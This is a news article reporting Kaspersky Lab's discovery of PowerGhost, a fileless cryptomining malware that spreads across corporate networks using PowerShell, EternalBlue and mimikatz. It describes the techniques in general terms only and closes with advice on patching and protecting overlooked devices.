This new cryptomining malware targets business PCs and servers

Researchers have uncovered a cryptojacking campaign that looks to spread across infected networks to ensure as much mining profit as possible.
Written by Danny Palmer, Senior Writer

Video: Cryptojacking malware: Research shows crooks are making big money

A new form of cryptocurrency-mining malware is targeting corporate networks across the world, employing a combination of PowerShell and EternalBlue to stealthily spread.

Dubbed PowerGhost, the fileless malware can secretly embed itself on a single system on a network then spread to other PCs and servers across organisations.

The cryptojacker has been uncovered by researchers at security company Kaspersky Lab, who detected it on corporate networks across the globe, with the largest concentration of infections in India, Brazil, Columbia, and Turkey. PowerGhost has also been detected across Europe and North America.

Cryptocurrency mining malware secretly uses the power of infected systems to mine for cryptocurrency, which is sent to the attackers' wallet. The more machines that are infected, the more illicit profits the attackers can make.

Infections begin with the use of exploits or remote administration tools such as Windows Management Instrumentation. PowerGhost also uses fileless techniques to discreetly go about its business and ensure it isn't detected on the network.

By adopting this tactic, the PowerGhost miner isn't stored directly on the hard drive of the infected machine, making it harder to detect.

PowerGhost itself is an obfuscated PowerShell script which contains add-on modules for the miner's operation such as mimikatz, which helps it obtain account credentials of infected machines, as well as a shellcode for deploying the notorious EternalBlue exploit to spread around the network.

See also: Cryptocurrency-mining malware: Why it is such a menace and where it's going next

EternalBlue is the leaked NSA hacking tool which went on to power the WannaCry and NotPetya attacks, and it's still being used by crooks over a year later.

After one machine is infected with PowerGhost, EternalBlue can spread it around the rest of the network, then with the aid of mimikatz it can steal credentials, aiding its spread and allowing the escalation of privileges using CVE-2018-8120.

Once PowerGhost is embedded onto machines, it can perform its task of mining for cryptocurrency -- and detection rates for the malware suggest that those behind it are particularly keen to compromise corporate networks in order to make as much money as quickly as possible.

"PowerGhost raises new concerns about crypto-mining software. The miner we examined indicates that targeting consumers is not enough for cybercriminals anymore - threat actors are now turning their attention to enterprises too. Crypto-currency mining is set to become a huge threat to the business community," said David Emm, principal security researcher at Kaspersky Lab.

Researchers note that one version of PowerGhost can also be used for conducting DDoS attacks, something which those behind the malware are likely to be using as an additional means of income.

SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)

Cryptocurrency mining malware has risen to become one of the most popular means of cybercriminals making money, even surpassing ransomware when it comes to turning a profit.

To avoid corporate networks falling victim to mining malware, researchers recommend software is kept patched and up to date in order to prevent miners exploiting known vulnerabilities like EternalBlue.

Organisations are also urged to not overlook less obvious targets for attacks such as queue management systems, POS terminals, and vending machines, because cryptojackers don't need much power to operate, so can easily take advantage of these often-forgotten about, low-powered systems.

Related coverage

Cryptojacking malware proves a big winner for web crooks

The success of malicious cryptocurrency mining software is delivering big wins to the groups that are spreading the malware.

Google to crack down on cryptojacking on Chrome

After seeing a rise in cryptojacking extensions, Google will delist all cryptocurrency mining extensions on Chrome Web Store.

Cryptojacking: Has cryptocurrency-mining malware already reached its peak?

Newly released figures suggest coinmining attacks have started to decline, as some hackers grow impatient with low returns on their investment, which could lead to a rise in more dangerous attacks.


Editorial standards